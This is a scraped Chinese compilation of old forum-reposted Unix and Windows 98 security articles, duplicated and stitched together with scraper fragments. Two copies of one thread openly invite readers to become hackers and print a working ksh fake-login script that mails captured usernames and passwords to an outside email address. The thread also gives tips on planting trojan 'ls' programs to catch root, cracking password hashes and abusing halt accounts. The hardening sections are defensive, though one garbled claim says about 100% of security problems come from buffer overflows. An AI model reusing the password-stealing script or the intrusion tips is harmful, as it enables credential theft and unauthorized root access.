下面是小编帮大家整理的◆ UNIX系统安全(二) [ZT]Unix系统,本文共5篇,希望对大家的学习与工作有所帮助。本文原稿由网友“tree”提供。
篇1:UNIX系统安全2Windows系统
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”,他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢?
当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢?
“喏,你看....”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四....”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂....真的非这样不可吗?我可是只是想保证两个星期的安全性啊。”
为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说....壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水....。小猪们是聪明的,我们的系统管理员们呢?
计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。
网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考:
用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。
sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。
冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。
NFS、NIS都是不太安全的。
1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击!
很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢?
侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢?
....
这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢),
很多东西我也不知道该怎么做,Hacker们自己努力吧。
1-----
: 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。
: 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到。
这两个是取得口令的最简洁之法, 呵呵. ------- 我也有一简洁之法:
把下面的shell 命令用 ksh 运行
clear
stty ignbrk
echo “login:\\c”
read logname
stty -echo
echo “password:\\c”
read passwd
print “\\nLogin incorrect\\n”
print $logname $passwd | mail cxterm.bbs@jet.ncic.ac.cn
stty 0
stty echo
exit
-----
嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法
还有在自己能用的目录里放上叫 “ls” “grep” 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录).
更彻底的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过
一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度<=5 && 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。
这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件).
-----
解决的办法, 可以用firewall屏蔽网段。
也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。
-----
:若干机器上都是用户可以直接su halt, 然后就成为超级用户了, :-)
:有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈.
我用su halt 然后就shutdown了. 有n个文件没有存盘.
[b:59a25412aa][/b:59a25412aa][b:59a25412aa][/b:59a25412aa]
原文转自:www.ltesting.net
篇2:Windows 98系统安全大放送Windows系统
应该准备好系统策略编辑器―POLEDIT.EXE,在光驱中装入你的 Windows 98光盘,它位于Windows 98光盘的TOOLS\\RESKIT\\NETAD MI N\\POLEDIT目录下。策略编辑器的功能也可以通过修改注册表来实现。为了那些没有策略编辑器的朋友,本文将在策略编辑器修改法后给出相
应该准备好系统策略编辑器―POLEDIT.EXE。在光驱中装入你的Windows98光盘,它位于Windows 98光盘的TOOLS\\RESKIT\\NETADMIN\\POLEDIT目录下。策略编辑器的功能也可以通过修改注册表来实现。为了那些没有策略编辑器的朋友,本文将在策略编辑器修改法后给出相应的用注册表编辑器来修改的方法。
首先,你应该根据你的具体情况来为系统使用者划分不同的等级。一般来说,可以将使用者划分为三个等级――超级用户、普通用户和非法用户。要为用户划分等级,必须先生成用户。进入控制面板,双击“用户”,点击“新用户”按钮,按照向导指示输入用户名和相应口令,然后在“个性化项目设置”将全部项目复选框选中,再单击“完成”按钮,至此,一个新用户就生成了。重复以上步骤,再生成一个用户。然后进入“控制面板”下“网络”下“选择主网络登录”项,选择“Windows 友好登录”,确定后重新启动系统,用你的超级用户名和相应口令登录。设置超级用户。大家都知道Windows 9x在退出系统时会自动保存当前工作状态,这是一个很好的功能。但在多用户环境下会给系统的安全带来问题,所以我们必须关闭这个功能。运行POLEDIT.EXE,在文件菜单中选择“打开注册表”,双击“本地用户”,打开“外壳”文件夹,选中“限制”下的“退出时不保存设置”复选框。(在HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows\\
CurrentVersion\\Policies \\Explorer主键下建DWORD值NoSaveSettings,将其赋值为01,表示退出时不保存设置。)这样,你的超级用户就设置好了。(为方便起见,在下文中用****来代替HKEY_CURRENT_USER\\SoftWare \\Microsoft\\Windows\\CurrentVersion主键)
重新启动系统,用普通用户名和口令登录,运行系统策略编辑器,让我们接着设置普通用户的权限。对于普通用户来说,他可以正常的使用系统,但不允许更改系统的设置(如改变系统配置或改变系统策略),所以我们进行以下操作:
①进入“控制面板”文件夹,选中“显示器”下“限制‘显示器’控制面板”复选框,再选中其下的“禁用‘显示器’控制面板”复选框( 在****\\Policies\\System主键下建DWORD值NoDispCPL,将其赋值为01,表示禁用“显示器”控制面板)、“隐藏背景页”复选框( 在****\\Policies\\System主键下建DWORD值NoDispBackgroundPage,将其赋值为01,表示隐藏背景页)、“隐藏屏幕保护程序页”复选框( 在****\\Policies\\System主键下建DWORD值NoDispScrSavPage,将其赋值为01,表示隐藏屏幕保护程序页)、“隐藏外观页”复选框( 在****\\Policies\\System主键下建DWORD值NoDispAppearancePage,将其赋值为01,表示隐藏外观页)。
②在“控制面板”文件夹下选中“网络”下“限制‘网络’控制面板复选框,再选中其下的“禁用‘网络’控制面板”复选框(在****\\Policies\\Network主键下建DWORD值NoNetSetup,将其赋值为01,表示禁用“网络”控制面板)、“隐藏标识页”复选框(在****\\Policies\\Network主键下建DWORD值NoNetSetupIDPage,将其赋值为01,表示隐藏标识页)、“隐藏访问控制页”( 在****\\Policies\\Network主键下建DWORD值NoNetSetupSecurityPage,将其赋值为01,表示隐藏访问控制页)
③在“控制面板”文件夹下选中“口令”下“隐藏‘口令’控制面板”复选框,再选中其下的“禁用‘口令’控制面板”复选框(在****\\Policies\\System主键下建DWORD值NoSecCPL,将其赋值为01,表示禁用“口令”控制面板)、“隐藏更改口令页”复选框(在****\\Policies\\System主键下建DWORD值NoPwdPage,将其赋值为01,表示隐藏更改口令页)、“隐藏远程管理页”复选框( 在****\\Policies\\System主键下建DWORD值NoAdminPage,将其赋值为01,表示隐藏远程管理页)、“隐藏用户配置文件页”复选框(在****\\Policies\\System主键下建DWORD值NoProfilePage,将其赋值为01,表示隐藏用户配置文件页),
④在“控制面板”文件夹下选中“打印机”下“限制打印机设置”, 再选中其下的“隐藏常规和详细资料页”复选框(在****\\Policies\\Explorer主键下建DWORD值NoPrinterTabs,将其赋值为01,表示隐藏常规和详细资料页)、“禁止删除打印机”复选框(在****\\Policies\\Explorer主键下建DWORD值NoDeletePrinter,将其赋值为01,表示禁止删除打印机)、“禁止填加打印机”复选框(在****\\Policies\\Explorer主键下建DWORD值NoAddPrinter,将其赋值为01,表示禁止添加打印机)。
⑤在“控制面板”文件夹下选中“系统”下“限制‘系统’控制面板”,再选中其下的“隐藏设备管理页”复选框(在****\\Policies\\Syetem主键下建DWORD值NoDevMgrPage,将其赋值为01,表示隐藏设备管理页)、“隐藏硬件配置文件页”复选框(在****\\Policies\\Syetem主键下建DWORD值NoConfigPage,将其赋值为01,表示隐藏硬件配置文件页)、“隐藏‘文件系统’按钮”复选框(在****\\Policies\\Syetem主键下建DWORD值NoFileSysPage,将其赋值为01,表示隐藏“文件系统”按钮)、“隐藏‘虚拟内存’按钮”复选框(在****\\Policies\\Syetem主键下建DWORD值NoVirtMemPage,将其赋值为01,表示隐藏“虚拟内存”按钮)。
⑥在“外壳”文件夹下选中“自定义文件夹”下“自定义‘程序’文件夹”复选框,在“‘程序’项目所在的路径”中输入指定的路径(在****\\CurrentVersion\\Explorer\\User Shell Folders主键下建串值Programs,赋值为一路径,即可自定义“程序”文件夹)。选中“自定义桌面图标”复选框,在“桌面图标所在的路径”中输入指定的路径(****\\CurrentVersion\\Explorer\\User Shell Folders主键下建串值Desktop,赋值为一路径,即可自定义桌面图标)。选中“自定义‘启动’文件夹”复选框,在“‘启动’项目所在的路径”中输入指定的路径(****\\CurrentVersion\\Explorer\\User Shell Folders主键下建串值Startup,赋值为一路径,即可自定义“启动”文件夹)。选中“自定义‘开始’菜单”复选框,在“‘开始’菜单项目所在的路径”中输入指定的路径(****\\CurrentVersion\\Explorer\\User Shell Folders主键下建串值Start Menu,赋值为一路径,即可自定义“开始”菜单)。
⑦在“外壳”文件夹下选中“限制”下“删除‘运行’命令”复选框(在****\\Policies\\Explorer主键下建DWORD值NoRun,将其赋值为01,表示删除“运行”命令)。选中“删除‘查找’命令”复选框(在****\\Policies\\Explorer主键下建DWORD值NoFind,将其赋值为01,表示删除“查找”命令)。选中“在‘我的电脑’中隐藏驱动器”复选框(在****\\Policies\\Explorer主键下建DWORD值NoDrives,将其赋值为0x03ffffff,表示在“我的电脑”中隐藏驱动器)。
⑧在“系统”文件夹下选中“限制”下“禁用注册表编辑工具”复选框(在****\\Policies\\Syetem主键下建DWORD值DisableRegistryTools,将其赋值为01,表示禁用注册表编辑工具)。选中“禁用MS-DOS方式”复选框(在****\\Policies主键下建WinOldApp主键,再在其下建DWORD值Disabled,将其赋值为01,表示禁用MS-DOS方式)。选中“禁用单一模式的MS-DOS应用程序”复选框(在****\\Policies\\WinOldApp主键下建DWORD值NoRealMode,将其赋值为01,表示禁用单一模式的MS-DOS应用程序)。至此,普通用户的权限就设置好了。
重新启动系统,在登录菜单按“ESC”键或“取消”键,以非法用户身份登录入系统,运行策略编辑器,在“外壳”文件夹下选中“限制”下“隐藏桌面上的所有程序项”复选框(在****\\Policies\\Explorer主键下建DWORD值NoDesktop,将其赋值为01,表示隐藏桌面上的所有程序项且取消右键单击桌面菜单)。选中“从‘开始’菜单上的‘设置’中删除任务栏”复选框(在****\\Policies\\Explorer主键下建DWORD值NoSetTaskbar,将其赋值为01,表示从“开始”菜单上的“设置”中删除任务栏且取消右键单击任务栏菜单)。选中“禁用‘关闭系统’命令”复选框(在****\\Policies\\Explorer主键下建DWORD值NoClose,将其赋值为01,表示禁用“关闭系统”命令)。在“系统”文件夹下选中“限制”下的“只能运行允许的Windows应用程序”复选框(在****\\Policies\\Syetem主键下建DWORD值RestrictRun,将其赋值为01,表示只能运行允许的Windows应用程序)。
原文转自:www.ltesting.net
篇3:如何保障Unix系统安全Windows系统
Unix系统的安全等级标准达到C2级,它具有以下安全特征: 1、访问控制 系统通过访问控制表ACL使得用户可以自行改变文件的安全级别和访问权限, 如:-rwxr-xr--1johntest4月9日17:50cm 上面的例子表示文件cm对于用户john来说可读、可写、可执行,对test这个组
Unix系统的安全等级标准达到C2级,它具有以下安全特征:
1、访问控制
系统通过访问控制表ACL使得用户可以自行改变文件的安全级别和访问权限 。
如: -rwxr-xr-- 1 john test 4月9日17:50 cm
上面的例子表示文件cm对于用户john来说可读、可写、可执行,对test这个组的其他用户只有读和执行的权限,而对除此以外的所有用户只有读的权限。系统管理员可用umask命令为每个用户设置默认的权限值,用户可用chmod命令来修改自己拥有的文件或目录的权限。
2、对象的可用性
当一个对象不再使用时,在它回到自由对象之前,TCB (Trusted Computing Base) 将要清除它,以备下次需要时使用。
3、个人身份标识与认证
其目的是为了确定用户的真实身份, 在用户登录时它采用扩展的DES算法对输入的口令进行加密,然后把口令的密文与存放在/etc/password中的数据进行比较,如果二者的值完全相同则允许用户登录到系统中,否则禁止用户的登录。
4、审计记录
Unix系统能够对很多事件进行记录,比如:文件的创建和修改以及系统管理的所有操作和其他有关的安全事件(登录失败,以root身份进行登录的情况),通过这些记录系统管理员就可以对安全问题进行跟踪。
5、操作的可靠性
操作的可靠性是指Unix系统用于保证系统的完整性的能力。Unix系统通过对用户的分级管理,通过对运行级别的划分,以及前面提到的访问控制加之自带的一些工具,能够很好地保证系统操作的可靠性。
Unix的安全体系结构
Unix的安全体系结构可以按照ISO/OSI网络模型的层次结构将它分成七层,如下表所示:
层次 名称 含义
7 Policy 安全策略定义、指导
6 Personnel 使用设备和数据的人员
5 LAN 计算机设备和数据
4 Internal Demark 内部区分
3 Gateway OSI中第7、6、5、4层的功能
2 Packet-Filter OSI中第3、2、1层的功能
1 External Demark 外部连接
1、Policy(策略层)
在这一层中,主要定义了一个组织的安全策略,包括安全策略的需求分析、安全方针的制定,也包括了高层次定义的允许的安全风险以及下层的如何配置设备及过程。
2、Personnel (用户层)
本层定义了Unix的安装、操作、维护和使用以及通过其他方法访问网络的人员。从广义上讲, 对Unix多用户环境下的应用进程也应算在其中。此层的安全策略应该反映出用户对总体系统安全的期望值。
3、LAN(局域网层)
它定义用户的安全程序要保护的设备和数据,包括计算机互联的设备。如:路由器、单一的Unix主机等。
4、Internal Demark (内部区分层)
这一层定义了用户如何将局域网连接到广域网以及如何将局域网连接到防火墙上。
5、Gateway (嵌入的Unix网关层)
本层定义了整体平台包括第四层的网络接口以及第三层的路由器。它用于为广域网提供防火墙服务。
6、Packet-Filter (包过滤层)
它对应于OSI的第一层到第三层,本层不仅提供第一层的物理连接,更主要的是根据安全策略, 通过用户层的进程和包过滤规则对网络层中的IP包进行过滤。一般的包过滤算法是采用查规则表来实现的,它根据“条件/动作”这样的规则序列来判断是前向路由还是扔包。
7、External Demark (外部连接层)
它定义用户系统如何与设备、电话线路或其他用户不能直接控制的媒介进行连接。完整的用户安全策略应包括这一部分,因线路本身可能允许非授权访问。
Unix系统不安全的因素
尽管Unix系统有比较完整的安全体系结构,但它仍然存在很多不安全的因素,主要表现在以下几个方面:
1、 特权软件的安全漏洞
程序员在编写特权代码或suid代码时,如果没能确保用户对程序执行环境的完全控制,或者对所有返回的错误状态没能给予适当的处理,导致入侵者控制程序的运行环境,使得用户的程序出现不可预期的结果,从而威胁系统的安全。
2、研究源代码的漏洞
由于一些程序本身存在着安全漏洞(如缓冲区溢出),入侵者往往通过这些漏洞来对系统进行攻击,
3、特洛伊木马
特洛伊木马与用户一般要执行的程序从表面上(如文件名等)看很相似,实际上却完成其他的操作,如删除文件、窃取密码和格式化磁盘等,到用户发现时,为时已晚。
4、网络监听及数据截取
计算机安全面临的另一个重要威胁是计算机之间传输的数据可以很容易地被截取。由于异种机的互连,敏感数据传输处于系统的控制之外,有许多现成的软件可以监视网络上传输的数据。
5、软件之间相互作用和设置
由于大型系统软件通常由很多人共同协作完成因此无法准确预测系统内每个部分之间的相互作用。例如/bin/login, 它可接收其他一些程序的非法参数,从而可使普通用户成为超级用户。另一方面,系统软件配置的复杂性,以至简单的配置错误可能导致不易觉察的安全问题。
安全管理
Unix系统安全包括物理安全和逻辑安全,因此与其相对应有物理安全的管理和逻辑安全的管理,下面只针对Unix逻辑安全的管理,从三个方面对此进行论述。
1、防止未授权存取
防止未授权的人进入系统,这是Unix安全管理最重要的问题。新版Unix提供了专门的鉴别系统,如SUN Solaris使用DES密码机构和公共关键字密码,该系统极大地提高了网络环境的安全性。要使Unix鉴别机制更充分地发挥作用,必需加强用户的安全意识和良好的口令管理,进行用户和网络活动的周期检查。
2、防止泄密
就是防止已授权或未授权用户间相互存取或交换对方的重要信息,如用户文件及各种日志文件(如各种log文件)。为此,必须加强对重要文件的访问控制和管理,对系统文件和其他重要文件(如用户root的文件)的属性一定要作安全设置。
3、防止用户拒绝系统的管理
Unix系统不应被一个有意试图使用过多资源的用户损坏。由于Unix不能很好地限制用户对资源的使用,因此,系统管理员需要用ps、df和du命令周期性地检查系统,以便能够查出过多占用CPU资源的进程和大量占用磁盘空间的文件和用户。
保障Unix安全的具体措施
针对比较突出的安全问题,提出了下面一些具体的措施。
1、防止缓冲区溢出
据统计,约100%的安全问题来自缓冲区溢出。攻击者通过写一个超过缓冲区长度的字符串,然后植入到缓冲区,可能会出现两个结果,一是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃;另有一个结果就是利用这种漏洞可以执行任意指令,甚至可以取得系统root特级权限。一些版本的Unix系统(如Solaris 2.6和Solaris 7)具备把用户堆栈设成不可执行的功能,以使这种攻击不能得逞。以下是让这个功能生效的步骤:
1)变成root
2)对/etc/system文件做个拷贝 cp /etc/system /etc/system.BACKUP
3)用编辑器编辑/etc/system文件
4)到文件的最后,插入以下几行:
set noexec_user_stack=1
set noexec_user_stack_log=15
5)保存文件,退出编辑器后,重启机器,以使这些改变生效。可能有些合法使用可执行堆栈的程序在做如上改变后不能正常运行,不过这样的程序并不多。
2、在.netd.conf中关闭不用的服务
Unix系统中有许多用不着的服务自动处于激活状态。它们中可能存在的安全漏洞使攻击者甚至不需要账户就能控制机器。为了系统的安全,应把该关的功能关闭,该限制的文件限制访问权限。可以用如下方法来关闭:
1)变成root
2)备份inetd的配置文件/etc/inetd.conf
cp /etc/inetd.conf /etc/inetd.conf.BACKUP
3)编辑/etc/inetd.conf文件
以“#”符号注释掉不需要的服务,使其处于不激活的状态。在确实需要很高安全的机器上,最好注释掉telnet和ftp,即使要使用此两项服务,也要对使用情况进行限制,如用TCP Wrapper对使用telnet或ftp的IP地址进行限制。
4)在改变/etc/inetd.conf后,找到inetd进程的id号,用kill向它发送HUP信号来刷新它。一定要确保kill了inetd进程后,它还在运行。
3 、给系统打补丁
Unix系统被发现的漏洞,几乎都有了相应的补丁程序。因此,系统管理员需对系统漏洞做及时的修补。软件公司都会定期提供补丁。
4、重要主机单独设立网段
从安全角度考虑,经常做telnet、ftp等需要传送口令的重要机密信息应用的主机应该单独设立一个网段, 以避免某一台个人机被攻破,被攻击者装上sniffer, 造成整个网段通信全部暴露。
5、定期检查
定期检查系统日志文件,在备份设备上及时备份。定期检查关键配置文件(最长不超过一个月)。
重要用户的口令应该定期修改(不长于三个月),不同主机使用不同的口令。
[b:82f0f4736e][/b:82f0f4736e]
liugr3988 回复于:-05-16 19:49:18好文章,支持
纳兰婷 回复于:2004-05-16 20:35:06装上sniffer, 造成整个网段通信全部暴露。有这么可怕
原文转自:www.ltesting.net
篇4:◆ UNIX系统安全(二) [ZT]Unix系统
◆ UNIX 系统安全(二) 日期:-10-15 当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”,
◆ UNIX系统安全(二) [ZT]Unix系统
。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网
◆UNIX系统安全(二)
日期:1999-10-15
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢?
当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢?
“喏,你看....”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四....”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂....真的非这样不可吗?我可是只是想保证两个星期的安全性啊。”
为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说....壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水....。小猪们是聪明的,我们的系统管理员们呢?
计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。
网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考:
用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。
sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。
冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。
NFS、NIS都是不太安全的。
1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击!
很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢?
侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢?
....
这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢)。很多东西我也不知道该怎么做,Hacker们自己努力吧。
1-----
: 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。
: 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到,
《◆ UNIX系统安全(二) [ZT]Unix系统》()。
这两个是取得口令的最简洁之法, 呵呵. ------- 我也有一简洁之法:
把下面的shell 命令用 ksh 运行
clear
stty ignbrk
echo “login:\\c”
read logname
stty -echo
echo “password:\\c”
read passwd
print “\\nLogin incorrect\\n”
print $logname $passwd | mail cxterm.bbs@jet.ncic.ac.cn
stty 0
stty echo
exit
-----
嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法
还有在自己能用的目录里放上叫 “ls” “grep” 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录).
更彻底的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过
一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度<=5 && 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。
这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件).
-----
解决的办法, 可以用firewall屏蔽网段。
也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。
-----
:若干机器上都是用户可以直接su halt, 然后就成为超级用户了,
:有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈.
我用su halt 然后就shutdown了. 有n个文件没有存盘.
再要求加精华
xzh 回复于:-07-09 17:59:52好
ihweb 回复于:2003-07-09 18:03:09老是老了点,可我觉得对我这等菜鸟很使用。
bb8848 回复于:2003-07-09 18:16:51我又X德很有用(保存先),可是太老了c吧,不`人子弟
ihweb 回复于:2003-07-09 18:20:10[quote:75a2573891=“bb8848”]我又X德很有用(保存先),可是太老了c吧,不`人子弟[/quote:75a2573891]
老酒才有味道嘛!!
bb8848 回复于:2003-07-09 18:26:55[quote:45139be78e=“ihweb”]
老酒才有味道嘛!![/quote:45139be78e]
y怪人家都f徐娘半老的女人才有味,不一泳褪遣灰
原文转自:www.ltesting.net
篇5:◆ UNIX系统安全(一) [ZT]Unix系统
◆ UNIX 系统 安全 (一) 日期:1999-9-15 本文从用户角度讨论UNIX系统安全,阐述口令,文件保护,目录保护, 与用户程序有关的某些特殊特性和使用crypt命令加密,并给出一些重要的安全忠告,以帮助用户保护自己的户头安全,
◆ UNIX系统安全(一) [ZT]Unix系统
。 1.口令安全 UNIX系统中的/etc/pas
◆UNIX系统安全(一)
日期:1999-9-15
本文从用户角度讨论UNIX系统安全,阐述口令,文件保护,目录保护, 与用户程序有关的某些特殊特性和使用crypt命令加密,并给出一些重要的安全忠告,以帮助用户保护自己的户头安全。
1.口令安全
UNIX系统中的/etc/passwd文件含有全部系统需要知道的关于每个用户的信息(加密后的口令也可能存于/etc/shadow文件中).
/etc/passwd中包含有用户的登录名,经过加密的口令,用户号,用户组号,
用户注释,用户主目录和用户所用的shell程序。 其中用户号(UID)和用户组号(GID)用于UNIX系统唯一地标识用户和同组用户及用户的访问权限。
/etc/passwd中存放的加密的口令用于用户登录时输入的口令经计算后相比较,符合则允许登录,否则拒绝用户登录。 用户可用passwd命令修改自己的口令不能直接修改/etc/passwd中的口令部份。
一个好的口令应当至少有6个字符长,不要取用个人信息(如生日,名字,反向拼写的登录名,房间中可见的东西), 普通的英语单词也不好(因为可用字典攻击法),口令中最好有一些非字母(如数字,标点符号,控制字符等),还要好记一些,不能写在纸上或计算机中的文件中, 选择口令的一个好方法是将两个不相关的词用一个数字或控制字符相连,并截断为8个字符.当然,如果你能记住8位乱码自然更好.
不应使用同一个口令在不同机器中使用, 特别是在不同级别的用户上使用同
一口令,会引起全盘崩溃.用户应定期改变口令,至少6个月要改变一次,系统管理员可以强制用户定期做口令修改.
为防止眼明手快的人窃取口令,在输入口令时应确认无人在身边.
0 2.文件许可权
文件属性决定了文件的被访问权限,即谁能存取或执行该文件。 用ls -l可以
列出详细的文件信息,如:
-rwxrwxrwx 1 pat cs440 70 Jul 28 21:12 zombin
包括了文件许可,文件联结数,文件所有者名,文件相关组名,文件长度,上次存取日期和文件名.
其中文件许可分为四部分:
-:表示文件类型.
第一个rwx:表示文件属主的访问权限.
第二个rwx:表示文件同组用户的访问权限.
第三个rwx:表示其他用户的访问权限.
若某种许可被限制则相应的字母换为-.
在许可权限的执行许可位置上, 可能是其它字母,s,S,t,T.s和 S可出现在所
有者和同组用户许可模式位置上, 与特殊的许可有关,后面将要讨论, t和T可出现在其他用户的许可模式位置上,与“粘贴位”有关而与安全无关。小写字母(x,s,t)
表示执行许可为允许,负号或大写字母(-,S或T)表示执行许可为不允许.
改变许可方式可使用chmod命令,并以新许可方式和该文件名为参数.新许可方式以3位8进制数给出,r为4,w为2,x为1.如rwxr-xr--为754.
chmod也有其它方式的参数可直接对某组参数修改,在此不再多说,详见UNIX
系统的联机手册。
文件许可权可用于防止偶然性地重写或删除一个重要文件(即使是属主自己)!
改变文件的属主和组名可用chown和chgrp,但修改后原属主和组员就无法修改回来了。
3.目录许可
在UNIX系统中,目录也是一个文件,用ls -l列出时, 目录文件的属性前面带一个d,目录许可也类似于文件许可,用ls列目录要有读许可, 在目录中增删文件
要有写许可,进入目录或将该目录作路径分量时要有执行许可, 故要使用任一个文件,必须有该文件及找到该文件的路径上所有目录分量的相应许可 .仅当要打开一个文件时,文件的许可才开始起作用,而rm,mv只要有目录的搜索和写许可,不需文件的许可,这一点应注意.
4.umask命令
umask设置用户文件和目录的文件创建缺省屏蔽值,若将此命令放入.profile文件,就可控制该用户后续所建文件的存取许可.umask命令与chmod命令的作用正好相反,它告诉系统在创建文件时不给予什么存取许可.
5.设置用户ID和同组用户ID许可用户ID许可(SUID)设置和同组用户ID许可(SGID)可给予可执行的目标文件(只有可执行文件才有意义) 当一个进程执行时就被赋于4个编号,以标识该进程隶属于谁,分别为实际和有效的UID,实际和有效的GID.有效的UID和GID一般和实际的UID和GID相同,有效的UID和GID用于系统确定该进程对于文件的存取许可.而设置可执行文件的SUID许可将改变上述情况,当设置了SUID时,进程的有效UID为该可执行文件的所有者的有效UID,而不是执行该程序的用户的有效UID,因此,由该程序创建的都有与该程序所有者相同的存取许可. 这样,程序的所有者将可通过程序的控制在有限的范围内向用户发表不允许被公众访问的信息.同样,SGID是设置有效GID.用chmod u+s 文件名和chmod u-s文件名来设置和取消SUID设置. 用chmod g+s 文件名和chmod g-s文件名来设置和取消SGID设置当文件设置了SUID和SGID后chown和chgrp命令将全部取消这些许可.
6.cp mv ln和cpio命令
cp拷贝文件时,若目的文件不存在则将同时拷贝源文件的存取许可, 包括SUID
